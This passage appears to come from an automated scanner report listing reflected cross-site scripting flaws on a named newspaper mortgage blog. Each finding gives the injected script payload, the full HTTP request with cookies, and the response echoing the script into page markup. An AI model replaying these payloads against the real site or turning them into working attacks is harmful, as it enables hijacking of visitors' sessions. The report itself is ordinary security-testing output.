GET /2011/01/14/ca-foreclosure-starts-fall-but-more-auctions-set/4134018630"><script>alert(1)</script>df0e4fbd4ac/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:09:55 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:09:55 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62710
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... rnate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/14/ca-foreclosure-starts-fall-but-more-auctions-set/4134018630\"><script>alert(1)</script>df0e4fbd4ac/feed/" /> ...[SNIP]...
1.362. http://mortgage.ocregister.com/2011/01/14/ca-foreclosure-starts-fall-but-more-auctions-set/41340/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87cd4"><script>alert(1)</script>0a7d55204ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 87cd4\"><script>alert(1)</script>0a7d55204ed in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/01/14/ca-foreclosure-starts-fall-but-more-auctions-set/41340/?87cd4"><script>alert(1)</script>0a7d55204ed=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:09:39 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Link: <http://mortgage.ocregister.com/?p=41340>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 80681
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http: ...[SNIP]... e=" CA. foreclosure starts fall, but more auctions set - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/14/ca-foreclosure-starts-fall-but-more-auctions-set/41340/?87cd4\"><script>alert(1)</script>0a7d55204ed=1feed/" /> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1aa0d"><script>alert(1)</script>b758a53c615 was submitted in the REST URL parameter 5. This input was echoed as 1aa0d\"><script>alert(1)</script>b758a53c615 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/01/14/newport-home-in-squatters-case-set-for-auction/413841aa0d"><script>alert(1)</script>b758a53c615/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:09:54 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:09:55 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62707
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... ternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/14/newport-home-in-squatters-case-set-for-auction/413841aa0d\"><script>alert(1)</script>b758a53c615/feed/" /> ...[SNIP]...
1.364. http://mortgage.ocregister.com/2011/01/14/newport-home-in-squatters-case-set-for-auction/41384/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27e8b"><script>alert(1)</script>6320bb6e639 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 27e8b\"><script>alert(1)</script>6320bb6e639 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/01/14/newport-home-in-squatters-case-set-for-auction/41384/?27e8b"><script>alert(1)</script>6320bb6e639=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:09:39 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Link: <http://mortgage.ocregister.com/?p=41384>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 89941
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http: ...[SNIP]... port home in ‘squatting’ case set for auction - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/14/newport-home-in-squatters-case-set-for-auction/41384/?27e8b\"><script>alert(1)</script>6320bb6e639=1feed/" /> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5115"><script>alert(1)</script>56f1b51a9ac was submitted in the REST URL parameter 5. This input was echoed as a5115\"><script>alert(1)</script>56f1b51a9ac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/01/15/poor-lender-service-dont-hold-your-breath-for-a-refund/41318a5115"><script>alert(1)</script>56f1b51a9ac/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:09:47 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:09:47 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62716
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/15/poor-lender-service-dont-hold-your-breath-for-a-refund/41318a5115\"><script>alert(1)</script>56f1b51a9ac/feed/" /> ...[SNIP]...
1.366. http://mortgage.ocregister.com/2011/01/15/poor-lender-service-dont-hold-your-breath-for-a-refund/41318/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf971"><script>alert(1)</script>7480d29f651 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bf971\"><script>alert(1)</script>7480d29f651 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/01/15/poor-lender-service-dont-hold-your-breath-for-a-refund/41318/?bf971"><script>alert(1)</script>7480d29f651=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:09:24 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Link: <http://mortgage.ocregister.com/?p=41318>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 81637
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http: ...[SNIP]... 217;t hold your breath for a refund - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/15/poor-lender-service-dont-hold-your-breath-for-a-refund/41318/?bf971\"><script>alert(1)</script>7480d29f651=1feed/" /> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e83f7"><script>alert(1)</script>7acb025cf16 was submitted in the REST URL parameter 5. This input was echoed as e83f7\"><script>alert(1)</script>7acb025cf16 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/01/25/foreclosures-down-31-in-state/41514e83f7"><script>alert(1)</script>7acb025cf16/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:09:44 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:09:44 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62691
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/25/foreclosures-down-31-in-state/41514e83f7\"><script>alert(1)</script>7acb025cf16/feed/" /> ...[SNIP]...
1.368. http://mortgage.ocregister.com/2011/01/25/foreclosures-down-31-in-state/41514/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/2011/01/25/foreclosures-down-31-in-state/41514/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39195"><script>alert(1)</script>7289003fdd6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 39195\"><script>alert(1)</script>7289003fdd6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/01/25/foreclosures-down-31-in-state/41514/?39195"><script>alert(1)</script>7289003fdd6=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:09:24 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Link: <http://mortgage.ocregister.com/?p=41514>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 78706
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http: ...[SNIP]... ernate" type="application/rss+xml" title=" Foreclosures down 31% in state - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/25/foreclosures-down-31-in-state/41514/?39195\"><script>alert(1)</script>7289003fdd6=1feed/" /> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70fcf"><script>alert(1)</script>62ea07ed0d1 was submitted in the REST URL parameter 5. This input was echoed as 70fcf\"><script>alert(1)</script>62ea07ed0d1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/01/26/7900-o-c-homes-seized-in-2010/4153270fcf"><script>alert(1)</script>62ea07ed0d1/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:09:54 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:09:54 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62691
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/26/7900-o-c-homes-seized-in-2010/4153270fcf\"><script>alert(1)</script>62ea07ed0d1/feed/" /> ...[SNIP]...
1.370. http://mortgage.ocregister.com/2011/01/26/7900-o-c-homes-seized-in-2010/41532/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/2011/01/26/7900-o-c-homes-seized-in-2010/41532/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7f46"><script>alert(1)</script>4549895a33a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a7f46\"><script>alert(1)</script>4549895a33a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/01/26/7900-o-c-homes-seized-in-2010/41532/?a7f46"><script>alert(1)</script>4549895a33a=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:09:39 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Link: <http://mortgage.ocregister.com/?p=41532>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 115806
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http: ...[SNIP]... rnate" type="application/rss+xml" title=" 7,900 O.C. homes seized in 2010 - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/26/7900-o-c-homes-seized-in-2010/41532/?a7f46\"><script>alert(1)</script>4549895a33a=1feed/" /> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4962"><script>alert(1)</script>87890681c86 was submitted in the REST URL parameter 5. This input was echoed as e4962\"><script>alert(1)</script>87890681c86 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/01/29/3-5-million-irvine-foreclosure-hits-market/41590e4962"><script>alert(1)</script>87890681c86/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:09:38 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:09:38 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62704
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... ="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/29/3-5-million-irvine-foreclosure-hits-market/41590e4962\"><script>alert(1)</script>87890681c86/feed/" /> ...[SNIP]...
1.372. http://mortgage.ocregister.com/2011/01/29/3-5-million-irvine-foreclosure-hits-market/41590/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a36eb"><script>alert(1)</script>60713eca42a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a36eb\"><script>alert(1)</script>60713eca42a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/01/29/3-5-million-irvine-foreclosure-hits-market/41590/?a36eb"><script>alert(1)</script>60713eca42a=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:09:06 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Link: <http://mortgage.ocregister.com/?p=41590>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 83515
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http: ...[SNIP]... rss+xml" title=" $3.5 million Irvine foreclosure hits market - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/29/3-5-million-irvine-foreclosure-hits-market/41590/?a36eb\"><script>alert(1)</script>60713eca42a=1feed/" /> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5367a"><script>alert(1)</script>8c4f91db03b was submitted in the REST URL parameter 5. This input was echoed as 5367a\"><script>alert(1)</script>8c4f91db03b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/01/29/couple-might-be-better-off-with-short-sale/415025367a"><script>alert(1)</script>8c4f91db03b/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:09:50 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:09:50 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62704
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... ="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/29/couple-might-be-better-off-with-short-sale/415025367a\"><script>alert(1)</script>8c4f91db03b/feed/" /> ...[SNIP]...
1.374. http://mortgage.ocregister.com/2011/01/29/couple-might-be-better-off-with-short-sale/41502/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c45d"><script>alert(1)</script>8eb8cd1b964 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6c45d\"><script>alert(1)</script>8eb8cd1b964 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/01/29/couple-might-be-better-off-with-short-sale/41502/?6c45d"><script>alert(1)</script>8eb8cd1b964=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:09:29 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Link: <http://mortgage.ocregister.com/?p=41502>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 77827
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http: ...[SNIP]... /rss+xml" title=" Couple might be better off with short sale - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/29/couple-might-be-better-off-with-short-sale/41502/?6c45d\"><script>alert(1)</script>8eb8cd1b964=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6be24"><script>alert(1)</script>6d101414c29 was submitted in the REST URL parameter 1. This input was echoed as 6be24\"><script>alert(1)</script>6d101414c29 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /20116be24"><script>alert(1)</script>6d101414c29/02/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
